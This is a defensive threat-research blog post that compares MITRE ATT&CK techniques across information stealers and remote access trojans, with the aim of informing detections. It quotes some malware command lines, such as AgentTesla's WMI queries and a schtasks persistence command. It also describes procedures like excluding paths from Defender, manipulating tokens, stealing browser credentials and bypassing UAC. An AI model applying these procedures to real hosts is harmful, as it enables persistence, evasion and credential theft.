A Shared Arsenal: Identifying Common TTPs Across RATs

Modern malware rarely operates in isolation, behind the scenes, many Information-stealing and Remote Access Trojans (RATs) shares strikingly similar MITRE ATT&CK Tactics, Techniques and Procedures (TTPs) that are valuable in terms of defense and incident response.

In this blog, the Splunk Threat Research Team (STRT) explores the similarities across malware families we observed or have been reported in the wild across the years, mapped through the MITRE ATT&CK framework to highlight recurring TTPs. We will uncover patterns that reveal how threat actors achieve persistence, evade defenses, and exfiltrate data at scale. In addition to these shared techniques, we also document unique and lesser-seen TTPs that may indicate evolving tradecraft or specialized tooling, helping distinguish specific malware families and providing security analysts and blue teamers with clearer guidance during investigations.

The Landscape: A Shared Arsenal

We’ve investigated around 18~ distinct malware families to identify overlapping behaviors. While these tools are sold or distributed by different groups, their operational playbooks can be often identical. So, let’s start with some statistics gathered from our own research and publicly reported data.

The Common TTPs – Technique Overlap

To establish a baseline, we first examined technique-level overlap, using a combination of internal and publicly reported research. This analysis focuses strictly on what techniques are used, without yet considering how those techniques are implemented.

This data demonstrates that while malware families may differ in implementation details, they largely collapse into a common behavioral pattern at the technique level. Let us take a look at some examples.

Ingress Tool Transfer – T1105

Starting with the most common technique across most families. This translates basically to the malware, having the ability to “download” additional payloads, stages or files.

When you think about it, kind of make sense that this is the most “common” technique across this type of threat.

System Information Discovery – T1082

System Information Discovery comes second, and here these malware families often aim to collect information such as the computer's name, OS, Memory, etc. Examples include:

• PlugX variants used a command called “GetSystemInfo” to collect extensive information about machines.
• AgentTesla used Windows Management Instrumentation (WMI)for system information discovery.

Start iwbemservices::execquery -select * from win32_operatingsystem
Start iwbemservices::execquery -select * from win32_processor

Application Layer Protocol: Web Protocols – T1071.001

Another common theme is the use of protocols such as HTTP for C2 communications. As reported by [1][2] and others.

For defenders, this reinforces the value of “technique-centric” detection strategies over a hash-based or IOC approach, as a small set of well-covered techniques can provide visibility across a broad threat scope.

However, while technique-level aggregation provides a useful starting point for identifying overlap, it can only offer a high-level view of adversary behavior. Different malware families may share the same technique but could use different implementations at the procedure level, which is where detections are often built.

Also, it's worth noting that at this basic level of aggregation the data can be skewed a bit. Where if a technique is only used once, it will be counted towards the overall usage. Which we do not necessarily want.

To avoid this and capture more detection-oriented data and details, we extend the analysis and examine common implementations across these families.

The Common TTPs – A Focus on Procedures

To inform detections, the following sections focus on how common techniques are executed/implemented in practice.

System Information Discovery - T1082

3 out of 18 of these malware families abused the Windows Management Instrumentation (WMI) command for system information discovery as part of its beacon communication to its Command-and-Control server.

This data commonly helps the attacker to identify and differentiate the posture and structure of the compromised host or system.

We’ve seen an example of AgentTesla in the previous section. The figure below shows the list of WMI commands used by Quasar RAT for its system information discovery.

Gather Victim Network Information - T1590.005

7 out of the 17 malware families analyzed by STRT were observed collecting network-related information, such as the public IP address, geographic location, and other metadata, by querying external IP-lookup web services.

For example, Figure 3 shows a screenshot of the system-information-gathering routines used by the Phemedrone malware family. Within its GetGeoInformation() method, the malware contacts the web service hxxp[://]ip-api[.]com/json/?fields=11827 to retrieve geolocation data and associated details from the compromised host.

Another example is the Meduza Stealer. Figure 4 shows the function responsible for initializing the web service it uses to gather network-related information. In this case, the malware queries hxxps[:]//api[.]ipify[.]org to obtain the public IP address of the compromised system.

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - T1547.001

The use of the Windows Registry Run keys to maintain persistence has been a common theme across these families. By adding entries to these Run keys, the malware ensures it automatically starts each time the infected system reboots. This technique is favored by attackers because it is simple, reliable, and often overlooked by basic security tools.

On the other hand, AgentTesla creates Registry RunOnce keys using VBScript to maintain persistence on compromised hosts.

AgentTesla also modifies the registry to ensure execution upon user logon by adding a value under the HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows key. The Load value points to a malicious shortcut located in the %TEMP% directory:

Scheduled Task/Job: Scheduled Task - T1053.005

The same set of malware families also leverage schtasks.exe to create scheduled tasks, enabling persistence and sometimes privilege escalation on compromised systems. As shown in Figure 7 below, the code snippet from the Dark Crystal RAT demonstrates how this malware uses the Windows schtasks.exe utility to establish a scheduled task, a technique observed in several other RAT families like AsyncRAT analyzed by STRT.

Sentinelone also documented an additional persistence mechanism used by AgentTesla that leverages scheduled tasks and registry modification. In this technique, the malware creates a scheduled task using schtasks.exe with an XML configuration file stored in the temporary directory, allowing more granular control over task settings and execution behavior:

Schtasks.exe /Create /TN "UpdatesxjZWstBWrIuw" /XML C:\Usersxxxxxx\AppData\Local\Temp\tmp1718.tmp"

Impair Defenses: Disable or Modify Tools - T1562.001

As part of their defense-evasion techniques, 5 out of the 17 analyzed malware families attempt to weaken Windows Defender by adding exclusion rules for the malware file path on the compromised host. This allows them to avoid antivirus detection.

For example, Figure 10shows ValleyRAT code that uses PowerShell to exclude the entire “C:\ drive” from Windows Defender’s scanning scope.

Access Token Manipulation: Create Process with Token - T1134.002

5 out of 18 malware families manipulate the process token to gain greater control over other processes on the system. This privilege is normally granted only to administrators or system-level services because it allows a process to inspect, open, and modify any other process, including those running as SYSTEM.

Figure 12 shows a screenshot of the ValleyRAT code responsible for adjusting the token privileges of its own process. Specifically, it enables SeDebugPrivilege, allowing the malware to obtain elevated access and exert greater control over other processes on the system.

Credentials from Web Browsers - T1555.003

11 of these malware families also commonly target and decrypt sensitive credentials stored in browser databases. By using this technique, attackers can harvest and exfiltrate valuable information from infected systems, significantly compromising user privacy and security.

Figure 14 displays a de-obfuscated Python script from Braodo malware, which demonstrates how credentials are extracted from popular web browsers.

Web Service - T1102

6 of these malware families abuse legitimate web services either as their command‑and‑control infrastructure or as remote storage locations for updated payloads that are later retrieved by their stagers or loaders.

Figure 16 shows the datasets of URL links related to the redline stealer that show legitimate web services that are being abused as C2 servers.

Figure 17 shows the de‑obfuscated batch script loader for Braodo Stealer. The script contains a PowerShell command that downloads the actual Braodo Stealer payload from either GitLab or Dropbox, both of which are abused as hosting services by the malware.

The Unique TTPs – We Are Not the Same

Beyond their commonalities, these families also bring a somewhat unique set of TTPs or implementations sometimes. This section highlights unique TTPs observed across this set of malware families.

Disk Wipe: Disk Structure Wipe - T1561.002

NJRAT, also known as “Bladabindi,” is a well-known Remote Access Trojan (RAT) designed to collect and steal sensitive information from targeted or compromised systems. Interestingly, STRT identified a unique technique in one variant that could overwrite the Master Boot Record (MBR) of the Windows operating system.

Virtualization/Sandbox Evasion: Time Based Checks - T1497.003

The STRT identified an interesting TTP associated with DarkCrystal RAT, the use of “W32tm” command with the “stripchart” parameter as an execution‑delay mechanism for both runtime and beaconing activities. This command is rarely used by typical users or legitimate applications in a production environment, making it a strong behavioral pivot point for detecting potential DarkCrystal RAT activity.

As with DarkCrystal RAT,  AsyncRAT also using a similar technique, leveraging the “timeout” command in a batch script to delay removal of its malware sample from the %TEMP% folder.

Bypass User Account Control - T1548.002

Among the other RATs and Trojan stealers, Castle RAT stands out for its use of the AppInfo RPC service UUID to bypass Windows User Account Control (UAC). This technique enables the malware to launch its payload using a process handle taken from a trusted Windows binary (ComputerDefaults.exe), granting it elevated privileges without triggering UAC prompts.

Impair Defenses: Disable or Modify Tools - T1562.001

One notable TTP observed in Redline Stealer is its modification of registry keys and disabling of services responsible for Windows Update on the compromised host. This technique is particularly interesting because it helps the malware maintain persistence, reduces the likelihood of security patches being applied, and increases the attacker’s window of opportunity to operate undetected.

In the previous sections, we showed that while these malware families may differ in name or origin, they often share an amount of behavioral overlap that we can focus on to get the best return in terms of detection coverage.

At the same time, we must keep in mind that these families are not “identical”; each brings its own unique TTPs and implementation details. These differences are often just as valuable to pursue, as they can help distinguish between families during investigations and expose more specialized or evolving tradecraft.

ESCU already provides many detections covering the TTPs we’ve discussed in this blog. Please do check out the “Appendix: Splunk Threat Research Team Blog References” section that references the different analytic stories and their linked detections.

Appendix: Splunk Threat Research Team Blog References

Learn More

This blog helps security analysts, blue teamers, and Splunk users identify Commonalities in RATs, Trojan Stealer and Malicious Loader by enabling the community to discover related tactics, techniques, and procedures used by threat actors and adversaries. You can implement the detections in this blog using the Enterprise Security Content Updates app or the Splunk Security Essentials app. To view the Splunk Threat Research Team's complete security content repository, visit research.splunk.com.

Feedback

Any feedback or requests? Feel free to put in an issue on GitHub and we’ll follow up. Alternatively, join us on the Slack channel #security-research.

Contributors

We would like to thank Nasreddine Bencherchali and Teoderick Contreras for authoring this post and the entire Splunk Threat Research Team for their contributions: Michael Haag, Bhavin Patel, Rod Soto, Eric McGinnis, Patrick Bareiss, Raven Tait, AJ King and Jose Hernandez.